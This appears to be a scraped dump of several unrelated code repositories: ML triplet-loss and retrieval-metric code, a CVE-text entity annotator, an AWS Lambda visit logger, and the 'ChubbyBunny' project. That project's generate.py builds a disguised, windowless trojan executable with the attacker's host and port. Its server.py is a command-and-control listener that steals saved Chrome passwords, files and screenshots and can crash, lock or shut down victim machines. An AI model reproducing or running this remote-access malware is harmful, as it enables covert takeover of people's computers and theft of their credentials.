anchor_negative_distance = torch.mul(pairwise_distances, 1.0 - self._get_anchor_negative_triplet_mask(labels).float())
max_anchor_negative_dist, _ = torch.max(pairwise_distances, dim=1, keepdim=True)
anchor_negative_dist = pairwise_distances + max_anchor_negative_dist * self._get_anchor_positive_triplet_mask(labels).float()
hardest_negative_distance, _ = torch.min(anchor_negative_dist, dim=1, keepdim=True)
triplet_loss = (hardest_positive_distance - hardest_negative_distance).mean()
triplet_loss = torch.log( 1 + torch.exp( self.alpha * ( (hardest_positive_distance - hardest_negative_distance).mean() )))
return triplet_loss
def batch_hard(self, X, labels):
pairwise_distances = self._pairwise_distances(X,X)
# Valid anchor positives have same label and i != j
anchor_positive_distance = torch.mul(pairwise_distances, self._get_anchor_positive_triplet_mask(labels).float())
hardest_positive_distance, _ = torch.max(anchor_positive_distance, dim=1)
# Valid anchor negatives x-y have different label
anchor_negative_distance = torch.mul(pairwise_distances, 1.0 - self._get_anchor_negative_triplet_mask(labels).float())
max_anchor_negative_dist, _ = torch.max(pairwise_distances, dim=1, keepdim=True)
anchor_negative_dist = pairwise_distances + max_anchor_negative_dist * self._get_anchor_positive_triplet_mask(labels).float()
hardest_negative_distance, _ = torch.min(anchor_negative_dist, dim=1, keepdim=True)
triplet_loss = torch.log( 1 + torch.exp( self.alpha * ( (hardest_positive_distance - hardest_negative_distance).mean() )))
return triplet_loss
class SoftTripletLoss(softTriplet):
def __init__(self, cfg, device):
super(SoftTripletLoss, self).__init__(cfg.alpha, False, device)
self.cfg = cfg
self.device = device
def batch_all(self, X,Y,Labels, final_strategy):
l1 = super().batch_all_X_Y(X,Y,Labels,final_strategy)
l2 = super().batch_all_X_Y(Y,X,Labels,final_strategy)
l3 = super().batchall(X,Labels,final_strategy)
l4 = super().batchall(Y,Labels,final_strategy)
return l1, l2, l3, l4
def batch_hard(self, X,Y,Labels, final_strategy):
l1 = super().batch_hard_X_Y(X,Y,Labels)
l2 = super().batch_hard_X_Y(Y,X,Labels)
l3 = super().batch_hard(X,Labels)
l4 = super().batch_hard(Y,Labels)
return l1, l2, l3, l4
```
#### File: Image-Map-Embeddings/models/street2vec_model.py
```python
import torch
import itertools
import torch.nn.functional as F
from .base_model import BaseModel
from .nets.street2vec_nets import define_netX, define_netY, define_netEMBX, define_netEMBY
from .nets.softtriplet import SoftTripletLoss
class Street2VecModel(BaseModel):
""" This class implements the network for embedding images and map tiles
It expect as input a dictionary with images from two domains X and Y.
"""
@staticmethod
def modify_commandline_options(parser, is_train=True):
"""Add new dataset-specific options, and rewrite default values for existing options.
Parameters:
parser -- original option parser
is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.
Returns:
the modified parser.
"""
parser.add_argument('--embedding_dim', type=int, default=16, help='Dimension size in the embedding space')
parser.add_argument('--scale', type=int, default=32, help='Radius of the hypersphere')
parser.add_argument('--no_l2_norm', action='store_true', help='Disable l2-norm')
parser.add_argument('--alpha', type=float, default=0.2, help='For soft triplet loss')
if is_train:
parser.set_defaults(batch_size=15,n_epochs=30, n_epochs_decay=20, lr=0.00004)
parser.add_argument('--l1', type=float, default=1.0, help='Lambda 1 factor for loss function')
parser.add_argument('--l2', type=float, default=1.0, help='Lambda 2 factor for loss function')
parser.add_argument('--l3', type=float, default=1.0, help='Lambda 3 factor for loss function')
parser.add_argument('--l4', type=float, default=1.0, help='Lambda 4 factor for loss function')
else:
parser.set_defaults(batch_size=15, eval=True)
return parser
def __init__(self, opt):
"""Initialize the class.
Parameters:
opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseModel.__init__(self, opt)
if self.opt.isTrain and len(opt.domain) == 1:
raise AssertionError('Street2vec model requeres two domains, only {} was given'.format(opt.domain))
self.loss_names = ['l1', 'l2', 'l3', 'l4', 'soft']
self.visual_names = ['X','Yf','Yl','Yr','Yb'] if opt.panorama_mode == 'list' else ['X_thumbnail', 'Y_thumbnail']
# Define networks
self.model_names = ['X','Y', 'EMBX','EMBY']
self.netX = define_netX(opt)
self.netY = define_netY(opt)
self.netEMBX = define_netEMBX(opt)
self.netEMBY = define_netEMBY(opt)
if self.opt.isTrain:
parameters = []
for net_name in self.model_names:
net = getattr(self, 'net'+net_name)
parameters.append(net.parameters())
self.optimizer_names = ['O']
self.optimizer_O = torch.optim.Adam(itertools.chain(*parameters), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizers = [self.optimizer_O]
self.criterion = SoftTripletLoss(self.opt, self.device)
def set_input(self, sample):
"""Unpack sample data from the dataloader and perform necessary pre-processing steps.
The data can be in either of the following formats
- when opt.panorama_mode is list ->
Parameters:
sample (dict): include the data itself and its metadata information.
"""
X = sample[self.opt.domain[0]].to(self.device)
Y = sample[self.opt.domain[1]].to(self.device)
self.X = X.view(-1, 3, X.size(3), X.size(4)) # X - > [batch_size, num_augmentations, num_channels, width, heigth]
if self.opt.panorama_mode == 'list':
# Y -> [batch_size, num_augmentations, snaps*, num_channels, width, heigth]
self.Yf = Y[:,:,0,:,:,:].view(-1,3,Y.size(4), Y.size(5))
self.Yl = Y[:,:,1,:,:,:].view(-1,3,Y.size(4), Y.size(5))
self.Yr = Y[:,:,2,:,:,:].view(-1,3,Y.size(4), Y.size(5))
self.Yb = Y[:,:,3,:,:,:].view(-1,3,Y.size(4), Y.size(5))
else:
# Y - > [batch_size, num_augmentations, num_channels, width, heigth]
self.Y = Y.view(-1, 3, Y.size(3), Y.size(4))
self.Y_thumbnail = F.interpolate(self.Y, size=128).detach() # For visualization
self.X_thumbnail = F.interpolate(self.X, size=128).detach() # For visualization
self.index = sample['index']
self.labels = sample['labels'].to(self.device).view(-1)
self.N = self.opt.batch_size*self.opt.num_augmentations
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
self.X_f = self.netX(self.X)
self.X_d = self.X_f.view(self.X_f.size(0),-1)
if self.opt.panorama_mode == 'list':
self.Y_flist = [self.netY(getattr(self, name)) for name in ['Yf','Yl','Yr','Yb']]
self.Y_dlist = [Y.view(Y.size(0),-1) for Y in self.Y_flist]
self.Y_d = torch.cat(self.Y_dlist,dim=1)
else:
self.Y_f = self.netY(self.Y)
self.Y_d = self.Y_f.view(self.Y_f.size(0),-1)
self.X_o = self.netEMBX(self.X_d)
self.Y_o = self.netEMBY(self.Y_d)
def backward(self):
"""Calculate loss"""
self.loss_l1, self.loss_l2, self.loss_l3, self.loss_l4 = self.criterion.batch_all(self.X_o, self.Y_o, self.labels, 'mean')
self.loss_soft = self.opt.l1 * self.loss_l1 + self.opt.l2 * self.loss_l2 + self.opt.l3 * self.loss_l3 + self.opt.l4 * self.loss_l4
self.loss_soft.backward()
def optimize_parameters(self):
self.forward()
self.optimizer_O.zero_grad()
self.backward()
self.optimizer_O.step()
def compute_visuals(self, writer, total_iters):
visuals = self.get_current_visuals()
images = []
vnames = ''
for key in visuals:
mean = torch.Tensor([0.5, 0.5, 0.5]).view(1,3,1,1).to(self.device)
std = torch.Tensor([0.5, 0.5, 0.5]).view(1,3,1,1).to(self.device)
v = visuals[key]*std + mean
images.append(v[0])
vnames += '-' + key
images = torch.stack(images,0)
writer.add_images(vnames, images, global_step=total_iters)
```
#### File: Image-Map-Embeddings/options/localize_options.py
```python
import argparse
import localizer
from .base_options import BaseOptions
class LocalizeOptions(BaseOptions):
"""This class includes test options.
It also includes shared options defined in BaseOptions.
"""
def initialize(self, parser):
parser = BaseOptions.initialize(self, parser)
parser.set_defaults(phase='localize')
parser.add_argument('--results_dir', type=str, default='./results/', help='saves results here.')
parser.add_argument('--steps', type=int, default = None, help='Number of steps')
parser.add_argument('--visualize', action='store_true', help='If set a figure displaying current state will be produced at each step')
parser.add_argument('--nosave', action='store_true', help='If set save experiment information')
self.isTrain = False
return parser
```
#### File: Image-Map-Embeddings/utils/metrics.py
```python
import numpy as np
from sklearn.metrics import pairwise_distances
import matplotlib.pyplot as plt
class NumpyMetrics():
def __init__(self, metric='euclidean'):
self.metric = metric
def rank(self, x,y, x_labels, y_labels):
distances = pairwise_distances(x,y,self.metric)
batch_size = x_labels.shape[0]
sorted_distances_indices = np.argsort(distances, axis=1)
labels_matrix = np.tile(x_labels, batch_size).reshape((batch_size, batch_size))
retrived_labels = np.take(labels_matrix, sorted_distances_indices)
labels_equal = np.equal(np.expand_dims(y_labels,axis=1), retrived_labels)
rank = np.argmax(labels_equal.astype(float), axis=1) + 1
return rank
def elements_by_class(self, x_labels):
'''Count the total of elements of each class in the eval set
Return unique_labels -> A numpy array with the index of the labels
count -> Number of elements of each class in the test set
'''
unique_labels = np.unique(x_labels) # Make and array of unique labels
label_matrix = np.equal(np.expand_dims(unique_labels, axis=1), np.expand_dims(x_labels, axis=0)) #shape [No.classes,1],[1,Eval_size] -> [No_classes,Eval_size]
count = label_matrix.sum(axis=1)
return unique_labels,count
def true_positives(self, distances, x_labels, y_labels, k):
'''
Find the k nearest y given x, then check if the label of y correnspond to x, and accumulate.
'''
sorted_distances_indices = np.argsort(distances,axis=1) #
batch_size = x_labels.shape[0]
labels_matrix = np.tile(x_labels, batch_size).reshape((batch_size, batch_size)) # True label matrix
retrieved_labels = np.take(labels_matrix,sorted_distances_indices) #The sorted retrieved labels matrix
labels_equal = np.equal(np.expand_dims(y_labels, axis=1), retrieved_labels) # Where the retrieved label == true label
tp = np.sum(labels_equal[:,0:k], axis=1) # Aparece cuando debe aparecer
return tp
def false_negative(self, distances, x_labels, y_labels, k):
sorted_distances_indices = np.argsort(distances,axis=1) #
batch_size = x_labels.shape[0]
labels_matrix = np.tile(x_labels, batch_size).reshape((batch_size, batch_size)) # True label matrix
retrieved_labels = np.take(labels_matrix,sorted_distances_indices) #The sorted retrieved labels matrix
labels_equal = np.equal(np.expand_dims(y_labels, axis=1), retrieved_labels) # Where the retrieved label == true label
fn = np.sum(labels_equal[:,k:], axis=1)
return fn
def false_positives(self, distances, x_labels, y_labels, k):
'Estan y no deberian estar'
sorted_distances_indices = np.argsort(distances,axis=1) #
batch_size = x_labels.shape[0]
labels_matrix = np.tile(x_labels, batch_size).reshape((batch_size, batch_size)) # True label matrix
retrieved_labels = np.take(labels_matrix,sorted_distances_indices) #The sorted retrieved labels matrix
labels_equal = np.equal(np.expand_dims(y_labels, axis=1), retrieved_labels) # Where the retrieved label == true label
labels_not_equal = np.logical_not(labels_equal)
fp = np.sum(labels_not_equal[:,0:k], axis=1)
return fp
def precision_at_k(self, x,y, x_labels, y_labels, k):
''' The ability of a classificator model to identify only the relevant points.
Precision = true_positives /(true_positives + false_positives) '''
distances = pairwise_distances(x,y,self.metric)
tp = self.true_positives(distances, x_labels, y_labels, k)
#fp = self.false_positives(distances, x_labels, y_labels, k)
fn = self.false_negative(distances, x_labels, y_labels, k)
fp = np.minimum(k - tp, fn)
precision_at_k = tp / (tp + fp)
return precision_at_k
def recall_at_k(self, x, y, x_labels, y_labels, k):
'''
Percentage of total relevant results correctly classified by the algorithm
The ability of a model to find all relevant cases within a dataset.
Recall = true_positives / (true_positives + false_negatives)
The ability of the model to retrieve a relevenat pair of one domain given a query of the other domain
'''
distances = pairwise_distances(x,y,self.metric)
tp = self.true_positives(distances, x_labels, y_labels, k)
fn = self.false_negative(distances, x_labels, y_labels, k)
fn = np.minimum(fn,k-tp)
recall_at_k = tp / (tp + fn)
return recall_at_k
def average_rank_at_k(self, x, y, labels):
rank = self.rank(x,y,labels, labels)
for k in [1,5,10,20,50,100,500,5000]:
percentage = (rank <= k).sum() / x.shape[0]
print(' Top {:.3f}, {:.3f}'.format(k,percentage))
def rank_curve(self, x, y, labels):
rank = self.rank(x,y,labels,labels)
print("Average rank", rank.mean())
count_percentage = np.zeros((x.shape[0]), dtype=float)
for i in range(x.shape[0]):
count_percentage[i] = (rank <= i+1).sum() / x.shape[0]
plt.plot(count_percentage)
plt.show()
plt.waitforbuttonpress()
``` |
{
"source": "0berry/CVE-analyzer",
"score": 3
} |
#### File: 0berry/CVE-analyzer/annotator.py
```python
import csv
import json
import sys
import re
import en_core_web_lg
def usage():
print 'usage: python annotator.py <path_to_dataset_in_csv> <output_file>'
def _get_annotations(desc, pattern, label):
regex = re.compile(pattern)
return [(match.start(), match.start() + len(match.group()), label) for match in regex.finditer(desc)]
# ------------------- ANNOTATION RULES -------------------
def find_functions(desc):
pattern = r'[a-zA-Z0-9]+(_[a-zA-Z0-9]+)+'
return _get_annotations(desc, pattern, "FUNCTION")
def find_kernel_version(desc):
pattern = r'\d+(\.\d+)+(-?)(\w+)?'
return _get_annotations(desc, pattern, "VERSION")
def find_file_path(desc):
pattern = r'(/)?\w+(/\w+)+\.c'
return _get_annotations(desc, pattern, "SOURCECODE")
def find_fd_driver(desc):
pattern = r'(/)?\w+(/\w+(?!\.c))+'
return _get_annotations(desc, pattern, "DRIVER")
def find_driver(desc):
pattern = r'[a-zA-Z]+\s[a-zA-Z\-]+\s(?=driver)'
return _get_annotations(desc, pattern, "DRIVER")
def find_structs(desc):
pattern = r'(?<=struct\s)\w+(\s\w+)'
return _get_annotations(desc, pattern, "STRUCT")
# ------------------- END ANNOTATION RULES -------------------
TAGGERS = [
find_functions,
find_kernel_version,
find_file_path,
find_driver,
find_structs,
find_fd_driver
]
def annotate_NER(dataset_file):
TRAIN_DATA = []
with open(dataset_file, 'r') as cve_dataset_f:
# cve_reader = csv.DictReader(cve_dataset_f, delimiter=';')
for cve in cve_dataset_f:
entities = []
for tagger in TAGGERS:
entities += tagger(cve)
TRAIN_DATA += [[cve, {'entities': entities}]]
with open('annotated_{}_NER_train.json'.format(dataset_file.replace('.csv', '')), 'w') as annotated_f:
json.dump(TRAIN_DATA, annotated_f)
def annotate_DEP(dataset_file):
TRAIN_DATA = []
model = en_core_web_lg.load()
with open(dataset_file, 'r') as cve_dataset_f:
cve_reader = csv.DictReader(cve_dataset_f, delimiter=';')
for cve in cve_reader:
tagged_desc = model(unicode(cve['Avail.']))
heads = [tok.head.i for tok in tagged_desc]
deps = ['-']*len(heads)
TRAIN_DATA += [[cve['Avail.'], {'heads': heads, 'deps': deps}]]
with open('annotated_{}_DEP_train.json'.format(dataset_file.replace('.csv', '')), 'w') as annotated_f:
json.dump(TRAIN_DATA, annotated_f)
def main(dataset_file):
annotate_NER(dataset_file)
# annotate_DEP(dataset_file)
if __name__ == '__main__':
if len(sys.argv) <= 1:
usage()
sys.exit(0)
main(sys.argv[1])
```
#### File: CVE-analyzer/cve_analyzer/analyzer.py
```python
import os
import logging
import json
import random
from pathlib import Path
import spacy
from spacy.util import minibatch, compounding
from collections import defaultdict
log = logging.getLogger('CVE_Analyzer')
# ------------------------ PERFORMANCES ------------------------
def _compute_performances(performaces, annotations, entities):
predictions = [[ent.start_char, ent.end_char, ent.label_] for ent in entities]
for entry in annotations + predictions:
if entry in annotations and entry in predictions:
performaces["tp"] += 1
elif entry in annotations and entry not in predictions:
performaces["fn"] += 1
elif entry not in annotations and entry in predictions:
performaces["fp"] += 1
else:
performaces['tn'] += 1
def _compute_precision(performaces):
return float(performaces["tp"]) / (performaces["tp"] + performaces["fp"])
def _compute_recall(performaces):
return float(performaces["tp"]) / (performaces["tp"] + performaces["fn"])
def _compute_f_measure(precision, recall):
return 2*precision*recall / (precision + recall)
def _compute_accuracy(performaces):
return float((performaces['tp'] + performaces['tn'])) / \
float((performaces['tp'] + performaces['tn'] + performaces['fp'] + performaces['fn']))
def _get_dataset(dataset_path):
if not os.path.exists(dataset_path):
raise OSError("Dataset file {} not found".format(dataset_path))
with open(dataset_path, 'r') as dataset_f:
dataset = json.load(dataset_f)
return dataset
def _get_ner_component(nlp):
# Add entity recognizer to model if it's not in the pipeline
# nlp.create_pipe works for built-ins that are registered with spaCy
if 'ner' not in nlp.pipe_names:
ner = nlp.create_pipe('ner')
nlp.add_pipe(ner)
# otherwise, get it, so we can add labels to it
else:
ner = nlp.get_pipe('ner')
return ner
# ------------------------ EXPORTED METHODS ------------------------
def get_train_and_test_sets(dataset_file, split_ratio):
dataset = _get_dataset(dataset_file)
random.shuffle(dataset)
split = int(len(dataset)*split_ratio)
return dataset[:split], dataset[split:]
def pp_performances(accuracy, precision, recall, f_measure):
print("\n-------------------------------------------")
print("PERFORMANCES:")
print("\nAccuracy: {}".format(accuracy))
print("Precision: {}".format(precision))
print("Recall: {}".format(recall))
print("F-measure: {}".format(f_measure))
print("\n-------------------------------------------")
def save_model(output_dir, model_name, nlp):
output_dir = Path(output_dir)
if not output_dir.exists():
output_dir.mkdir(parents=True, exist_ok=True)
nlp.meta['name'] = model_name
nlp.to_disk(output_dir)
log.debug("Saved model to %s", output_dir)
def get_model(model_path):
return spacy.load(model_path)
def test(nlp, testset):
performances = {
"tp": 0,
"fp": 0,
"fn": 0,
"tn": 0
}
for description, annotations in testset:
doc = nlp(description)
_compute_performances(performances, annotations['entities'], doc.ents)
performances['accuracy'] = _compute_accuracy(performances)
performances['precision'] = _compute_precision(performances)
performances['recall'] = _compute_recall(performances)
performances['f_measure'] = _compute_f_measure(performances['precision'], performances['recall'])
return performances
def train(trainset, labels, n_iter, drop_rate):
nlp = spacy.blank('en')
ner = _get_ner_component(nlp)
for label in labels:
ner.add_label(label)
optimizer = nlp.begin_training()
# get names of other pipes to disable them during training
other_pipes = [pipe for pipe in nlp.pipe_names if pipe != 'ner']
with nlp.disable_pipes(*other_pipes): # only train NER
for _ in range(n_iter):
random.shuffle(trainset)
losses = {}
# batch up the examples using spaCy's minibatch
batches = minibatch(trainset, size=compounding(4., 32., 1.001))
for batch in batches:
texts, annotations = zip(*batch)
nlp.update(texts, annotations, sgd=optimizer, drop=drop_rate, losses=losses)
log.debug('Losses %r', losses)
return nlp
def get_prediction_for_description(nlp, description):
doc = nlp(description)
raw_predictions = [[ent.start_char, ent.end_char, ent.label_] for ent in doc.ents]
formatted_prediction = defaultdict(list)
for (start_idx, end_idx, label) in raw_predictions:
formatted_prediction[label].append(description[start_idx: end_idx])
return formatted_prediction
def get_default_model():
return spacy.load(os.path.join(os.path.dirname(__file__), 'model'))
def get_default_dataset():
return _get_dataset(os.path.join(os.path.dirname(__file__), 'dataset/dataset.json'))
```
#### File: trainer/server/uploader.py
```python
import csv
import sys
import requests
API_ENDPOINT = 'http://127.0.0.1:5000'
def usage():
print('usage: python uploader.py <path_to_csv_file>')
def main(csv_path):
with open(csv_path, 'r') as csv_f:
data = csv.DictReader(csv_f, delimiter='\t')
for cve in data:
response = requests.post(
API_ENDPOINT + "/postNewCve",
params={"cve_id": cve['CVE ID'], "cve_description": cve['Descr.']}
)
if response.status_code != 200:
print("Error during post of {}".format(cve['CVE ID']))
else:
print("Successfully posted {}".format(cve['CVE ID']))
if __name__ == '__main__':
if len(sys.argv) != 2:
usage()
sys.exit(-1)
main(sys.argv[1])
``` |
{
"source": "0BL1V10N-V01D/ChubbyBunny",
"score": 3
} |
#### File: 0BL1V10N-V01D/ChubbyBunny/generate.py
```python
import subprocess
from shutil import copyfile
import os
import socket
import base64
import sys
import pickle
import time
GREEN = '\33[32m'
RED = '\33[31m'
END = '\33[0m'
BOLD = '\33[1m'
#print(GREEN + BOLD + "\nThis isn't set up yet! Very soon... Please use the 'client.py' with the github instructions instead.\n" + END)
print(' ')
host = input(GREEN + BOLD + 'Set LHOST IP: ' + END)
port = input(GREEN + BOLD + 'Set LPORT: ' + END)
name = input(GREEN + BOLD + 'Enter the basename for output files: ' + END)
def createFile():
try:
global copiedFile
print(GREEN + BOLD + '\nCreating python file...\n')
time.sleep(2)
exampleFile = os.getcwd() + '/source/example.py'
copiedFile = os.getcwd() + '/output/' + name + '.py'
copyfile(exampleFile, copiedFile)
with open(copiedFile, 'r') as file:
filedata = file.read()
replaceHOST = "host = '" + host + "'"
filedata = filedata.replace("host = ''", replaceHOST)
with open(copiedFile, 'w') as file:
file.write(filedata)
with open(copiedFile, 'r') as file:
filedata = file.read()
replacePORT = "port = " + port
filedata = filedata.replace("port = ''", replacePORT)
with open(copiedFile, 'w') as file:
file.write(filedata)
except:
print(RED + BOLD + "Couldn't create python file. Quitting...")
sys.exit()
def pythonToExe():
try:
ico = input('\n' + GREEN + BOLD + 'Path to icon file:')
print(GREEN + BOLD + '\nGenerating exe file...\n')
p = subprocess.Popen(['pyinstaller', '-y', '-F', '-w', '-i', ico, '-n', name, copiedFile], cwd = 'output/')
p.wait()
except:
print(RED + BOLD + "Couldn't create exe file. Quitting...")
sys.exit()
def done():
time.sleep(2)
print(GREEN + BOLD + "\nDone! Saved to the 'dist' directory in the output folder!")
time.sleep(2)
def main():
createFile()
pythonToExe()
done()
if __name__ == "__main__":
main()
```
#### File: 0BL1V10N-V01D/ChubbyBunny/server.py
```python
import socket
import subprocess
import sys
import os
import time
import signal
import readline
import pickle
import struct
import base64
from io import StringIO, BytesIO
import base64
from PIL import Image
import datetime
subprocess.call(['clear'])
GREEN = '\33[32m'
RED = '\33[31m'
YELLOW = '\33[33m'
CYAN = '\033[1;36m'
VIOLET = '\33[35m'
BLUE = '\33[34m'
END = '\33[0m'
BOLD = '\33[1m'
CURL = '\33[4m'
restarting = (YELLOW + BOLD + '\n[!] Trying to restart... ' + END)
restartTerminal = (YELLOW + BOLD + '[!] Sometimes restarting the terminal may help... ' + END)
failed = (RED + BOLD + '[!] Failed!' + END)
def signal_handler(sig, frame):
print(RED + BOLD + '\n\nQuitting...\n' + END)
sys.exit(0)
def printBanner():
print(BLUE + BOLD + ' ____ ____')
print(" /' | | \\")
print(' / / | | \ \\')
print(' / / | | | \ \\')
print(' ( / | """" |\ \ ' + END + BOLD + ' Ahhh HA!!!')
print(BLUE + BOLD + ' | / / /^\ /^\ \ _| ' + END + BOLD + ' I love big big carrot!!!')
print(BLUE + BOLD + ' ~ | | | | | | ~')
print(' | |__' + END + BOLD + 'O' + BLUE + BOLD + '|__|' + END + BOLD + 'O' + BLUE + BOLD + '__| |')
print(' /~~ \/ ~~\\')
print(' / ( | ) \\')
print(" _--_ /, \____/^\___/' \ _--_")
print(' /~ ~\ / -____-|_|_|-____-\ /~ ~\\')
print(' /________|___/~~~~\___/~~~~\ __|________\\')
print('--~~~ ^ | | | | - : ~~~~~:~-_ ___-----~~~~~~~~|')
print(" / `^-^-^' `^-^-^' : ~\ /' ____/--------|")
print(' ; : : |----------/--------|')
print(': , ' + VIOLET + BOLD + 'ChubbyListener:' + RED + BOLD + ' v1.0.0' + BLUE + BOLD + ' ; . |---\\--------------|')
print(' : - ' + VIOLET + BOLD + 'Writen by:' + RED + BOLD + ' 0BL1V10N V01D' + BLUE + BOLD + ' . : : |______________-__|')
print(" : , , : /'~----___________|")
print('__ \\\ ^ ,, ;; ;; ;._-~')
print(' ~~~-----____________________________________----~~~')
def socketCreate():
try:
global host
global port
global showPort
global s
host = input(GREEN + BOLD + '\nSet LHOST: ' + END)
port = input('\n' + GREEN + BOLD + 'Set LPORT: ' + END)
port = int(port)
showPort = str(port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error:
print(failed)
def socketBind():
try:
s.bind((host, port))
except socket.error:
print(failed)
print(restarting)
print(restartTerminal)
subprocess.call(['clear'])
socketBind()
def listening():
s.listen(1)
print(GREEN + BOLD + '\n[*] Listening on ' + END + CYAN + host + ':' + showPort + END)
def socketAccept():
global conn
global addr
conn, addr, = s.accept()
print(GREEN + BOLD + '\n[*] Session opened at ' + END + CYAN + addr[0] + ':' + str(addr[1]) + '\n' + END)
sendCommands(conn)
def sendCommands(conn):
while True:
cmd = input(CYAN + str(addr[0]) + ':' + str(addr[1]) + ' > ' + END)
if cmd == 'quit':
conn.close()
s.close()
sys.exit()
elif cmd == 'exit':
conn.close()
s.close()
sys.exit()
elif cmd == 'help':
print(' ')
print('Help Commands')
print('=============')
print(' ')
print('Commands Description')
print('-------- -----------')
print('quit Exit script')
print('exit Quit script')
print('sysinfo View basic client information')
print('screenshot Take a screenshot of machine')
print('download -s Download screenshot to your computer')
print("download -f [file] Download a .txt file from victim's machine")
print("download -c Download saved password chrome file")
print("openurl [url] Open a url page in the victim's machine")
print("chrome Attempt to retrieve saved chrome passwords")
print('memory Print phyiscal and virtual memory')
print('crash Attempt to crash computer')
print('lock Lock computer screen')
print('shutdown Shutdown computer')
print('restart Restart computer')
print(' ')
elif cmd == 'sysinfo':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print(clientResponse)
elif cmd == 'clear':
subprocess.call(['clear'])
elif cmd == '':
pass
elif cmd == 'shutdown':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print(clientResponse)
elif cmd == 'restart':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print(clientResponse)
elif cmd == 'memory':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), 'utf-8')
print(clientResponse)
print(' ')
elif cmd[:7] == 'openurl':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print(clientResponse)
elif cmd == 'crash':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print(clientResponse)
elif cmd[:4] == 'lock':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print('\n' + clientResponse, end="")
elif cmd[:11] == 'download -f':
try:
conn.send(str.encode(cmd))
print('\n' + YELLOW + "[!] Please use this for 'txt' or other document file transfers. Use 'download -s' to transfer a taken screenshot. Type Q to quit." + END)
print(YELLOW + "[!] Recommended download size is no more than 3GBs! ")
filename = input('\n' + CYAN + '[*] Please enter a filename for the incoming file: ' + END + GREEN)
file = open('downloads/' + filename, 'wb')
file_data = conn.recv(1024)
print(GREEN + BOLD + '\n' + '[*] Downloading...' + END)
file.write(file_data)
file.close()
print(GREEN + BOLD + '[*] Downloaded successfully to downloads/' + filename + END)
except:
print(RED + BOLD + '[!] There was an error downloading your file.' + END)
pass
elif cmd == 'screenshot':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print('\n' + clientResponse, end='')
elif cmd == 'download -s':
print(' ')
print(GREEN + BOLD + '[*] Transfering screenshot... This can take up to 20 seconds...' + END)
conn.send(str.encode(cmd))
data = b""
payload_size = struct.calcsize(">L")
#print("payload_size: {}".format(payload_size))
while len(data) < payload_size:
#print("Recv: {}".format(len(data)))
data += conn.recv(8192)
#print("Done Recv: {}".format(len(data)))
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack(">L", packed_msg_size)[0]
#print("msg_size: {}".format(msg_size))
while len(data) < msg_size:
data += conn.recv(8192)
frame_data = data[:msg_size]
data = data[msg_size:]
frame=pickle.loads(frame_data, fix_imports=True, encoding="bytes")
frame = base64.b64decode(frame)
img = Image.open(BytesIO(frame))
imgname = 'downloads/screenshot' + str(datetime.datetime.now()) + '.png'
img.save(imgname)
print(GREEN + BOLD + '[*] Screenshot output in ' + END + CYAN + imgname + END)
print(' ')
elif cmd == 'chrome':
conn.send(str.encode(cmd))
print('')
print(GREEN + BOLD + "[*] Type 'download', let's see if this worked!")
print('')
elif cmd == 'download -c':
try:
conn.send(str.encode(cmd))
print('\n' + YELLOW + "[!] Please use this for 'txt' or other document file transfers. Use 'download -s' to transfer a taken screenshot. Type Q to quit." + END)
print(YELLOW + "[!] Recommended download size is no more than 3GBs! ")
filename = input('\n' + CYAN + '[*] Please enter a filename for the incoming file: ' + END + GREEN)
file = open(filename, 'wb')
file_data = conn.recv(1024)
print(GREEN + BOLD + '\n' + '[*] Downloading...' + END)
file.write(file_data)
file.close()
print(GREEN + BOLD + '[*] Downloaded successfully to ' + filename + END + '\n')
except:
print(RED + BOLD + '[!] There was an error downloading your file (Error is in server source code).' + END + '\n')
pass
def main():
signal.signal(signal.SIGINT, signal_handler)
printBanner()
socketCreate()
socketBind()
listening()
socketAccept()
if __name__ == '__main__':
main()
``` |
{
"source": "0brandy0/unified-makerspace-1",
"score": 2
} |
#### File: lambda_code/log_visit/log_visit.py
```python
import json
import datetime
from pydoc import cli
import boto3
from boto3.dynamodb.conditions import Key
from botocore.exceptions import ClientError
import logging
import traceback
import sys
import os
import re
class LogVisitFunction():
"""
This function will be used to wrap the functionality of the lambda
so we can more easily test with pytest.
"""
def __init__(self, table, ses_client):
self.logger = logging.getLogger()
self.logger.setLevel(logging.INFO)
if table is None:
# Get the service resource.
dynamodb = boto3.resource('dynamodb')
# Get the table name.
TABLE_NAME = os.environ["TABLE_NAME"]
# Get table objects
self.visits = dynamodb.Table(TABLE_NAME)
else:
self.visits = table
if ses_client is None:
AWS_REGION = os.environ['AWS_REGION']
self.client = boto3.client('ses', region_name=AWS_REGION)
else:
self.client = ses_client
def checkRegistration(self, current_user):
response = self.visits.query(
KeyConditionExpression=Key('PK').eq(current_user)
)
return response['Count']
# This code was written following the example from:
# https://docs.aws.amazon.com/ses/latest/DeveloperGuide/send-using-sdk-python.html
def registrationWorkflow(self, current_user):
# This address must be verified with Amazon SES.
SENDER = "<EMAIL>"
email_regex = re.compile(r"[^@]+@[^@]+\.[^@]+")
if not email_regex.match(current_user):
current_user = current_user + "@clemson.edu"
RECIPIENT = current_user
# One could consider using a configuration set here.
# To learn more about them please visit:
# https://docs.aws.amazon.com/ses/latest/DeveloperGuide/using-configuration-sets.html
SUBJECT = "Clemson University Makerspace Registration"
BODY_TEXT = ("Hello " + current_user + ",\n"
"Our records indicate that you have not registered as an existing user.\n"
"Please go to visit.cumaker.space/register to register as an existing user.\n"
)
# The character encoding for the email.
CHARSET = "UTF-8"
# Create a new SES resource and specify a region.
# Try to send the email.
try:
response = self.client.send_email(
Destination={
'ToAddresses': [
RECIPIENT,
],
},
Message={
'Body': {
'Text': {
'Charset': CHARSET,
'Data': BODY_TEXT,
},
},
'Subject': {
'Charset': CHARSET,
'Data': SUBJECT,
},
},
